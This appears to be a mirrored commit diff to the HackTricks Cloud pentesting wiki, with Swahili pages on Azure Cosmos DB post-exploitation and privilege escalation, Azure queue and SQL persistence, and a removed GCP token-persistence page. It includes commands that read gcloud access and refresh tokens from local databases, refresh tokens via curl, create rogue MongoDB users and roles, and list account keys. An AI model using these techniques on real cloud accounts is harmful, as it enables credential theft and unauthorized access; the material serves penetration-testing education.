gitea-mirror/hacktricks-cloud
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks-cloud.git synced 2026-02-05 19:32:24 -08:00
Code Issues Packages Projects Releases Wiki Activity

Translated ['src/pentesting-cloud/azure-security/az-post-exploitation/az

Browse Source
This commit is contained in:
Translator
2025-02-20 23:14:43 +00:00
parent acafe4bc3c
commit e85437dc6c
7 changed files with 78 additions and 202 deletions
Download Patch File Download Diff File Expand all files Collapse all files

1
searchindex.json
View File

File diff suppressed because one or more lines are too long

10
src/SUMMARY.md
View File

@@ -142,7 +142,7 @@
- [GCP - Logging Persistence](pentesting-cloud/gcp-security/gcp-persistence/gcp-logging-persistence.md)
- [GCP - Secret Manager Persistence](pentesting-cloud/gcp-security/gcp-persistence/gcp-secret-manager-persistence.md)
- [GCP - Storage Persistence](pentesting-cloud/gcp-security/gcp-persistence/gcp-storage-persistence.md)
- [GCP - Token Persistance](pentesting-cloud/gcp-security/gcp-persistence/gcp-non-svc-persistance.md)
- [GCP - Token Persistence](pentesting-cloud/gcp-security/gcp-persistence/gcp-non-svc-persistence.md)
- [GCP - Services](pentesting-cloud/gcp-security/gcp-services/README.md)
- [GCP - AI Platform Enum](pentesting-cloud/gcp-security/gcp-services/gcp-ai-platform-enum.md)
- [GCP - API Keys Enum](pentesting-cloud/gcp-security/gcp-services/gcp-api-keys-enum.md)
@@ -458,8 +458,8 @@
- [Az - Function Apps Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-function-apps-post-exploitation.md)
- [Az - Key Vault Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-key-vault-post-exploitation.md)
- [Az - Logic Apps Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-logic-apps-post-exploitation.md)
- [Az - MySQL](pentesting-cloud/azure-security/az-post-exploitation/az-mysql-post-exploitation.md)
- [Az - PostgreSQL](pentesting-cloud/azure-security/az-post-exploitation/az-postgresql-post-exploitation.md)
- [Az - MySQL Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-mysql-post-exploitation.md)
- [Az - PostgreSQL Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-postgresql-post-exploitation.md)
- [Az - Queue Storage Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-queue-post-exploitation.md)
- [Az - Service Bus Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-servicebus-post-exploitation.md)
- [Az - Table Storage Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-table-storage-post-exploitation.md)
@@ -489,8 +489,8 @@
- [Az - Persistence](pentesting-cloud/azure-security/az-persistence/README.md)
- [Az - Automation Accounts Persistence](pentesting-cloud/azure-security/az-persistence/az-automation-accounts-persistence.md)
- [Az - Cloud Shell Persistence](pentesting-cloud/azure-security/az-persistence/az-cloud-shell-persistence.md)
- [Az - Queue SQL Persistence](pentesting-cloud/azure-security/az-persistence/az-sql-persistance.md)
- [Az - Queue Storage Persistence](pentesting-cloud/azure-security/az-persistence/az-queue-persistance.md)
- [Az - Queue SQL Persistence](pentesting-cloud/azure-security/az-persistence/az-sql-persistence.md)
- [Az - Queue Storage Persistence](pentesting-cloud/azure-security/az-persistence/az-queue-persistence.md)
- [Az - VMs Persistence](pentesting-cloud/azure-security/az-persistence/az-vms-persistence.md)
- [Az - Storage Persistence](pentesting-cloud/azure-security/az-persistence/az-storage-persistence.md)
- [Az - Device Registration](pentesting-cloud/azure-security/az-device-registration.md)

29
src/pentesting-cloud/azure-security/az-persistence/az-queue-persistance.md
View File

@@ -1,29 +0,0 @@
# Az - Hifadhi ya Queue
{{#include ../../../banners/hacktricks-training.md}}
## Queue
Kwa maelezo zaidi angalia:
{{#ref}}
../az-services/az-queue.md
{{#endref}}
### Vitendo: `Microsoft.Storage/storageAccounts/queueServices/queues/write`
Ruhusa hii inamruhusu mshambuliaji kuunda au kubadilisha queues na mali zao ndani ya akaunti ya hifadhi. Inaweza kutumika kuunda queues zisizoidhinishwa, kubadilisha metadata, au kubadilisha orodha za udhibiti wa ufikiaji (ACLs) ili kutoa au kupunguza ufikiaji. Uwezo huu unaweza kuharibu michakato, kuingiza data mbaya, kuhamasisha taarifa nyeti, au kubadilisha mipangilio ya queue ili kuwezesha mashambulizi zaidi.
```bash
az storage queue create --name <new-queue-name> --account-name <storage-account>
az storage queue metadata update --name <queue-name> --metadata key1=value1 key2=value2 --account-name <storage-account>
az storage queue policy set --name <queue-name> --permissions rwd --expiry 2024-12-31T23:59:59Z --account-name <storage-account>
```
## Marejeo
- [https://learn.microsoft.com/en-us/azure/storage/queues/storage-powershell-how-to-use-queues](https://learn.microsoft.com/en-us/azure/storage/queues/storage-powershell-how-to-use-queues)
- [https://learn.microsoft.com/en-us/rest/api/storageservices/queue-service-rest-api](https://learn.microsoft.com/en-us/rest/api/storageservices/queue-service-rest-api)
- [https://learn.microsoft.com/en-us/azure/storage/queues/queues-auth-abac-attributes](https://learn.microsoft.com/en-us/azure/storage/queues/queues-auth-abac-attributes)
{{#include ../../../banners/hacktricks-training.md}}

20
src/pentesting-cloud/azure-security/az-persistence/az-sql-persistance.md
View File

@@ -1,20 +0,0 @@
# Az - SQL Persistence
{{#include ../../../banners/hacktricks-training.md}}
## SQL
Kwa maelezo zaidi angalia:
{{#ref}}
../az-services/az-sql.md
{{#endref}}
### Mbinu za Kawaida za Kudumu
- Pata taarifa za SQL au tengeneza mtumiaji wa SQL (kuwezesha uthibitishaji wa SQL ikiwa inahitajika)
- Teua mtumiaji aliyeathiriwa kama msimamizi wa Entra ID (kuwezesha uthibitishaji wa Entra ID ikiwa inahitajika)
- Backdoor katika VM (ikiwa VM ya SQL inatumika)
- Tengeneza sheria ya FW ili kudumisha ufikiaji wa hifadhidata ya SQL
{{#include ../../../banners/hacktricks-training.md}}

73
src/pentesting-cloud/azure-security/az-post-exploitation/az-cosmosDB-post-exploitation.md
View File

@@ -11,15 +11,28 @@ Kwa maelezo zaidi kuhusu SQL Database angalia:
### `Microsoft.DocumentDB/databaseAccounts/read` && `Microsoft.DocumentDB/databaseAccounts/write`
Kwa ruhusa hii, unaweza kuunda au kuboresha akaunti za Azure Cosmos DB. Hii inajumuisha kubadilisha mipangilio ya akaunti, kuongeza au kuondoa maeneo, kubadilisha viwango vya usawa, na kuwezesha au kuzima vipengele kama vile maandiko ya maeneo mengi.
Kwa ruhusa hii, unaweza kuunda au kuboresha akaunti za Azure Cosmos DB. Hii inajumuisha kubadilisha mipangilio ya akaunti, kuwezesha au kuzima uhamaji wa kiotomatiki, kusimamia udhibiti wa ufikiaji wa mtandao, kuweka sera za akiba, na kurekebisha viwango vya usawa. Washambuliaji wenye ruhusa hii wanaweza kubadilisha mipangilio ili kudhoofisha udhibiti wa usalama, kuharibu upatikanaji, au kuhamasisha data kwa kubadilisha sheria za mtandao.
```bash
az cosmosdb update \
--name <account_name> \
--resource-group <resource_group_name> \
--public-network-access ENABLED
```
```bash
az cosmosdb update \
--account-name <account_name> \
--resource-group <resource_group_name> \
--capabilities EnableMongoRoleBasedAccessControl
```
Zaidi ya hayo, unaweza kuwezesha utambulisho unaosimamiwa katika akaunti:
```bash
az cosmosdb identity assign \
--name <cosmosdb_account_name> \
--resource-group <resource_group_name>
```
### `Microsoft.DocumentDB/databaseAccounts/sqlDatabases/containers/read` && `Microsoft.DocumentDB/databaseAccounts/sqlDatabases/containers/write`
Kwa ruhusa hii, unaweza kuunda au kubadilisha kontena (makusanyo) ndani ya database ya SQL ya akaunti ya Azure Cosmos DB. Kontena zinatumika kuhifadhi data, na mabadiliko kwao yanaweza kuathiri muundo wa database na mifumo ya ufikiaji.
Kwa ruhusa hii, unaweza kuunda au kubadilisha kontena (makusanyo) ndani ya hifadhidata ya SQL ya akaunti ya Azure Cosmos DB. Kontena zinatumika kuhifadhi data, na mabadiliko kwao yanaweza kuathiri muundo wa hifadhidata na mifumo ya ufikiaji.
```bash
# Create
az cosmosdb sql container create \
@@ -47,7 +60,7 @@ az cosmosdb sql database create \
```
### `Microsoft.DocumentDB/databaseAccounts/failoverPriorityChange/action`
Kwa ruhusa hii, unaweza kubadilisha kipaumbele cha kufeli cha maeneo kwa akaunti ya database ya Azure Cosmos DB. Kitendo hiki kinatathmini mpangilio ambao maeneo yanakuwa ya msingi wakati wa tukio la kufeli. Matumizi yasiyo sahihi ya ruhusa hii yanaweza kuharibu upatikanaji wa juu wa database au kusababisha athari zisizokusudiwa za uendeshaji.
Kwa ruhusa hii, unaweza kubadilisha kipaumbele cha kufeli cha maeneo kwa akaunti ya hifadhidata ya Azure Cosmos DB. Kitendo hiki kinamua mpangilio ambao maeneo yanakuwa ya msingi wakati wa tukio la kufeli. Matumizi yasiyo sahihi ya ruhusa hii yanaweza kuharibu upatikanaji wa juu wa hifadhidata au kusababisha athari zisizokusudiwa za uendeshaji.
```bash
az cosmosdb failover-priority-change \
--name <database_account_name> \
@@ -66,7 +79,7 @@ az cosmosdb keys regenerate \
```
### `Microsoft.DocumentDB/databaseAccounts/sqlDatabases/containers/userDefinedFunctions/write` && `Microsoft.DocumentDB/databaseAccounts/sqlDatabases/containers/userDefinedFunctions/read`
Kwa ruhusa hii, unaweza kuunda au kubadilisha triggers ndani ya kontena la database ya SQL katika akaunti ya Azure Cosmos DB. Triggers zinakuwezesha kutekeleza mantiki ya upande wa seva kama jibu kwa operesheni.
Kwa ruhusa hii, unaweza kuunda au kubadilisha triggers ndani ya kontena la database ya SQL katika akaunti ya Azure Cosmos DB. Triggers zinakuwezesha kutekeleza mantiki ya upande wa seva kama majibu ya operesheni.
```bash
az cosmosdb sql trigger create \
--account-name <account_name> \
@@ -90,7 +103,7 @@ az cosmosdb sql stored-procedure create \
--body 'function sample() { return "Hello, Cosmos!"; }'
```
### `Microsoft.DocumentDB/databaseAccounts/sqlDatabases/containers/triggers/write` && `Microsoft.DocumentDB/databaseAccounts/sqlDatabases/containers/triggers/read`
Kwa ruhusa hii, unaweza kuunda au kubadilisha vichocheo ndani ya kontena la hifadhidata ya SQL katika akaunti ya Azure Cosmos DB. Vichocheo vinakuwezesha kutekeleza mantiki ya upande wa seva kama jibu kwa operesheni kama vile kuingiza, kusasisha, au kufuta.
Kwa ruhusa hii, unaweza kuunda au kubadilisha vichocheo ndani ya kontena la hifadhidata ya SQL katika akaunti ya Azure Cosmos DB. Vichocheo vinakuruhusu kutekeleza mantiki ya upande wa seva kama jibu kwa operesheni kama vile kuingiza, kusasisha, au kufuta.
```bash
az cosmosdb sql trigger create \
--account-name <account_name> \
@@ -112,59 +125,11 @@ az cosmosdb mongodb collection create \
--name <collection_name>
```
### `Microsoft.DocumentDB/databaseAccounts/mongodbDatabases/write` && `Microsoft.DocumentDB/databaseAccounts/mongodbDatabases/read`
Kwa ruhusa hii, unaweza kuunda hifadhidata mpya za MongoDB ndani ya akaunti ya Azure Cosmos DB. Hii inaruhusu kuandaa hifadhidata mpya kuhifadhi na kusimamia makusanyo na nyaraka.
Kwa ruhusa hii, unaweza kuunda hifadhidata mpya za MongoDB ndani ya akaunti ya Azure Cosmos DB. Hii inaruhusu kuandaa hifadhidata mpya kuhifadhi na kusimamia makusanyo na hati.
```bash
az cosmosdb mongodb database create \
--account-name <account_name> \
--resource-group <resource_group_name> \
--name <database_name>
```
### `Microsoft.DocumentDB/databaseAccounts/mongodbRoleDefinitions/write` && `Microsoft.DocumentDB/databaseAccounts/mongodbRoleDefinitions/read`
Kwa ruhusa hii, unaweza kuunda ufafanuzi mpya wa majukumu ya MongoDB ndani ya akaunti ya Azure Cosmos DB. Hii inaruhusu kufafanua majukumu maalum yenye ruhusa maalum kwa watumiaji wa MongoDB.
```bash
az cosmosdb mongodb role definition create \
--account-name <account_name> \
--resource-group <resource_group_name> \
--body '{
"Id": "<mydatabase>.readWriteRole",
"RoleName": "readWriteRole",
"Type": "CustomRole",
"DatabaseName": "<mydatabase>",
"Privileges": [
{
"Resource": {
"Db": "<mydatabase>",
"Collection": "mycollection"
},
"Actions": [
"insert",
"find",
"update"
]
}
],
"Roles": []
}'
```
### `Microsoft.DocumentDB/databaseAccounts/mongodbUserDefinitions/write` && `Microsoft.DocumentDB/databaseAccounts/mongodbUserDefinitions/read`
Kwa ruhusa hii, unaweza kuunda maelezo mapya ya mtumiaji wa MongoDB ndani ya akaunti ya Azure Cosmos DB. Hii inaruhusu upatikanaji wa watumiaji wenye majukumu maalum na viwango vya ufikiaji kwa hifadhidata za MongoDB.
```bash
az cosmosdb mongodb user definition create \
--account-name <account_name> \
--resource-group <resource_group_name> \
--body '{
"Id": "<mydatabase>.myUser",
"UserName": "myUser",
"Password": "mySecurePassword",
"DatabaseName": "<mydatabase>",
"CustomData": "TestCustomData",
"Mechanisms": "SCRAM-SHA-256",
"Roles": [
{
"Role": "readWriteRole",
"Db": "<mydatabase>"
}
]
}'
```
{{#include ../../../banners/hacktricks-training.md}}

57
src/pentesting-cloud/azure-security/az-privilege-escalation/az-cosmosDB-privesc.md
View File

@@ -11,7 +11,7 @@ Kwa maelezo zaidi kuhusu SQL Database angalia:
### (`Microsoft.DocumentDB/databaseAccounts/sqlRoleDefinitions/write`, `Microsoft.DocumentDB/databaseAccounts/sqlRoleDefinitions/read`) & (`Microsoft.DocumentDB/databaseAccounts/sqlRoleAssignments/write`, `Microsoft.DocumentDB/databaseAccounts/sqlRoleAssignments/read`)
Kwa ruhusa hizi unaweza kupandisha hadhi kwa kumuwezesha mtumiaji ruhusa za kutekeleza maswali na kuungana na hifadhidata. Kwanza, jukumu la ufafanuzi linaundwa likitoa ruhusa na mipaka inayohitajika.
Kwa ruhusa hizi unaweza kuongeza hadhi kwa kumpa mtumiaji ruhusa za kutekeleza maswali na kuungana na hifadhidata. Kwanza, jukumu la ufafanuzi linaundwa likitoa ruhusa na mipaka inayohitajika.
```bash
az cosmosdb sql role definition create \
--account-name <account_name> \
@@ -43,12 +43,63 @@ az cosmosdb sql role assignment create \
--principal-id <principal_id-togive-perms> \
--scope "/"
```
### (`Microsoft.DocumentDB/databaseAccounts/mongodbRoleDefinitions/write` && `Microsoft.DocumentDB/databaseAccounts/mongodbRoleDefinitions/read`)&& (`Microsoft.DocumentDB/databaseAccounts/mongodbUserDefinitions/write` && `Microsoft.DocumentDB/databaseAccounts/mongodbUserDefinitions/read`)
Kwa ruhusa hii, unaweza kuunda ufafanuzi mpya wa majukumu ya MongoDB ndani ya akaunti ya Azure Cosmos DB. Hii inaruhusu kufafanua majukumu maalum yenye ruhusa maalum kwa watumiaji wa MongoDB. Kazi za RBAC lazima ziwe zimewezeshwa ili kutumia hii.
```bash
az cosmosdb mongodb role definition create \
--account-name <account_name> \
--resource-group <resource_group_name> \
--body '{
"Id": "<mydatabase>.readWriteRole",
"RoleName": "readWriteRole",
"Type": "CustomRole",
"DatabaseName": "<mydatabase>",
"Privileges": [
{
"Resource": {
"Db": "<mydatabase>",
"Collection": "mycollection"
},
"Actions": [
"insert",
"find",
"update"
]
}
],
"Roles": []
}'
```
Unaweza kuunda ufafanuzi mpya wa mtumiaji wa MongoDB ndani ya akaunti ya Azure Cosmos DB. Hii inaruhusu ugawaji wa watumiaji wenye majukumu maalum na ufikiaji wa hifadhidata za MongoDB.
```bash
az cosmosdb mongodb user definition create \
--account-name <account_name> \
--resource-group <resource_group_name> \
--body '{
"Id": "<mydatabase>.myUser",
"UserName": "<myUser>",
"Password": "<mySecurePassword>",
"DatabaseName": "<mydatabase>",
"CustomData": "TestCustomData",
"Mechanisms": "SCRAM-SHA-256",
"Roles": [
{
"Role": "readWriteRole",
"Db": "<mydatabase>"
}
]
}'
```
Baada ya hapo, mtumiaji mpya anaundwa ndani ya MongoDB, tunaweza kuufikia:
```bash
mongosh "mongodb://<myUser>:<mySecurePassword>@<account_name>.mongo.cosmos.azure.com:10255/<mymongodatabase>?ssl=true&replicaSet=globaldb&retrywrites=false"
```
### `Microsoft.DocumentDB/databaseAccounts/listKeys/action`
Kwa ruhusa hii, unaweza kupata funguo za msingi na za pili za akaunti ya Azure Cosmos DB. Funguo hizi zinatoa ufikiaji kamili kwa akaunti ya hifadhidata na rasilimali zake, na kuwezesha vitendo kama vile kusoma data, kuandika, na mabadiliko ya usanidi.
Kwa ruhusa hii, unaweza kupata funguo za msingi na za pili za akaunti ya Azure Cosmos DB. Funguo hizi zinatoa ufikiaji kamili kwa akaunti ya hifadhidata na rasilimali zake, zikihusisha vitendo kama vile kusoma data, kuandika, na mabadiliko ya usanidi.
```bash
az cosmosdb keys list \
--name <account_name> \
--resource-group <resource_group_name>
```
{{#include ../../../banners/hacktricks-training.md}}

90
src/pentesting-cloud/gcp-security/gcp-persistence/gcp-non-svc-persistance.md
View File

@@ -1,90 +0,0 @@
# GCP - Token Persistance
{{#include ../../../banners/hacktricks-training.md}}
### Authenticated User Tokens
Ili kupata **token ya sasa** ya mtumiaji unaweza kukimbia:
```bash
sqlite3 $HOME/.config/gcloud/access_tokens.db "select access_token from access_tokens where account_id='<email>';"
```
Angalia katika ukurasa huu jinsi ya **kutumia moja kwa moja tokeni hii kwa kutumia gcloud**:
{{#ref}}
https://book.hacktricks.wiki/en/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.html#gcp
{{#endref}}
Ili kupata maelezo ya **kuunda tokeni mpya ya ufikiaji** endesha:
```bash
sqlite3 $HOME/.config/gcloud/credentials.db "select value from credentials where account_id='<email>';"
```
Ni pia inawezekana kupata refresh tokens katika **`$HOME/.config/gcloud/application_default_credentials.json`** na katika **`$HOME/.config/gcloud/legacy_credentials/*/adc.json`**.
Ili kupata access token mpya iliyosasishwa kwa kutumia **refresh token**, client ID, na client secret endesha:
```bash
curl -s --data client_id=<client_id> --data client_secret=<client_secret> --data grant_type=refresh_token --data refresh_token=<refresh_token> --data scope="https://www.googleapis.com/auth/cloud-platform https://www.googleapis.com/auth/accounts.reauth" https://www.googleapis.com/oauth2/v4/token
```
Uhalali wa refresh tokens unaweza kudhibitiwa katika **Admin** > **Security** > **Google Cloud session control**, na kwa default umewekwa kwa masaa 16 ingawa unaweza kuwekwa kutokufa milele:
<figure><img src="../../../images/image (11).png" alt=""><figcaption></figcaption></figure>
### Auth flow
Mchakato wa uthibitishaji unapokuwa ukitumia kitu kama `gcloud auth login` utafungua dirisha katika kivinjari na baada ya kukubali maeneo yote kivinjari kitatumia ombi kama hili kwa bandari ya http iliyofunguliwa na chombo:
```
/?state=EN5AK1GxwrEKgKog9ANBm0qDwWByYO&code=4/0AeaYSHCllDzZCAt2IlNWjMHqr4XKOuNuhOL-TM541gv-F6WOUsbwXiUgMYvo4Fg0NGzV9A&scope=email%20openid%20https://www.googleapis.com/auth/userinfo.email%20https://www.googleapis.com/auth/cloud-platform%20https://www.googleapis.com/auth/appengine.admin%20https://www.googleapis.com/auth/sqlservice.login%20https://www.googleapis.com/auth/compute%20https://www.googleapis.com/auth/accounts.reauth&authuser=0&prompt=consent HTTP/1.1
```
Then, gcloud itatumia hali na msimbo pamoja na `client_id` (`32555940559.apps.googleusercontent.com`) na **`client_secret`** (`ZmssLNjJy2998hD4CTg2ejr2`) kupata **data ya mwisho ya refresh token**.
> [!CAUTION]
> Kumbuka kwamba mawasiliano na localhost yako katika HTTP, hivyo inawezekana kukamata data ili kupata refresh token, hata hivyo data hii ni halali mara 1 tu, hivyo hii itakuwa haina maana, ni rahisi kusoma refresh token kutoka kwa faili.
### OAuth Scopes
Unaweza kupata scopes zote za Google katika [https://developers.google.com/identity/protocols/oauth2/scopes](https://developers.google.com/identity/protocols/oauth2/scopes) au kupata hizo kwa kutekeleza:
```bash
curl "https://developers.google.com/identity/protocols/oauth2/scopes" | grep -oE 'https://www.googleapis.com/auth/[a-zA-A/\-\._]*' | sort -u
```
Inawezekana kuona ni mipaka gani programu ambayo **`gcloud`** inatumia kujiandikisha inaweza kusaidia kwa kutumia skripti hii:
```bash
curl "https://developers.google.com/identity/protocols/oauth2/scopes" | grep -oE 'https://www.googleapis.com/auth/[a-zA-Z/\._\-]*' | sort -u | while read -r scope; do
echo -ne "Testing $scope \r"
if ! curl -v "https://accounts.google.com/o/oauth2/auth?response_type=code&client_id=32555940559.apps.googleusercontent.com&redirect_uri=http%3A%2F%2Flocalhost%3A8085%2F&scope=openid+https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fuserinfo.email+https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fcloud-platform+https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fappengine.admin+$scope+https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fsqlservice.login+https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fcompute+https%3A%2F%2Fwww.googleapis.com%2Fauth%2Faccounts.reauth&state=AjvFqBW5XNIw3VADagy5pvUSPraLQu&access_type=offline&code_challenge=IOk5F08WLn5xYPGRAHP9CTGHbLFDUElsP551ni2leN4&code_challenge_method=S256" 2>&1 | grep -q "error"; then
echo ""
echo $scope
fi
done
```
Baada ya kuitekeleza, ilikaguliwa kwamba programu hii inasaidia maeneo haya:
```
https://www.googleapis.com/auth/appengine.admin
https://www.googleapis.com/auth/bigquery
https://www.googleapis.com/auth/cloud-platform
https://www.googleapis.com/auth/compute
https://www.googleapis.com/auth/devstorage.full_control
https://www.googleapis.com/auth/drive
https://www.googleapis.com/auth/userinfo.email
```
ni ya kuvutia kuona jinsi programu hii inavyounga mkono **`drive`** scope, ambayo inaweza kumruhusu mtumiaji kupandisha hadhi kutoka GCP hadi Workspace ikiwa mshambuliaji atafanikiwa kumlazimisha mtumiaji kuunda tokeni yenye scope hii.
**Angalia jinsi ya** [**kudhulumu hii hapa**](../gcp-to-workspace-pivoting/index.html#abusing-gcloud)**.**
### Akaunti za Huduma
Kama ilivyo kwa watumiaji walioidhinishwa, ikiwa utafanikiwa **kudhulumu faili ya ufunguo wa faragha** ya akaunti ya huduma utaweza **kuipata kwa kawaida kwa muda wote unavyotaka**.\
Hata hivyo, ikiwa utaiba **tokeni ya OAuth** ya akaunti ya huduma hii inaweza kuwa ya kuvutia zaidi, kwa sababu, hata kama kwa kawaida tokeni hizi ni za manufaa kwa saa moja tu, ikiwa **mhasiriwa atafuta ufunguo wa faragha wa api, tokeni ya OAuh itabaki kuwa halali hadi itakapokwisha**.
### Metadata
Kwa wazi, kadri unavyokuwa ndani ya mashine inayofanya kazi katika mazingira ya GCP utaweza **kupata akaunti ya huduma iliyoambatanishwa na mashine hiyo kwa kuwasiliana na mwisho wa metadata** (zingatia kwamba tokeni za Oauth unazoweza kupata katika mwisho huu kwa kawaida zinapunguziliwa mbali na scopes).
### Marekebisho
Marekebisho kadhaa kwa mbinu hizi yanaelezwa katika [https://www.netskope.com/blog/gcp-oauth-token-hijacking-in-google-cloud-part-2](https://www.netskope.com/blog/gcp-oauth-token-hijacking-in-google-cloud-part-2)
### Marejeleo
- [https://www.netskope.com/blog/gcp-oauth-token-hijacking-in-google-cloud-part-1](https://www.netskope.com/blog/gcp-oauth-token-hijacking-in-google-cloud-part-1)
- [https://www.netskope.com/blog/gcp-oauth-token-hijacking-in-google-cloud-part-2](https://www.netskope.com/blog/gcp-oauth-token-hijacking-in-google-cloud-part-2)
{{#include ../../../banners/hacktricks-training.md}}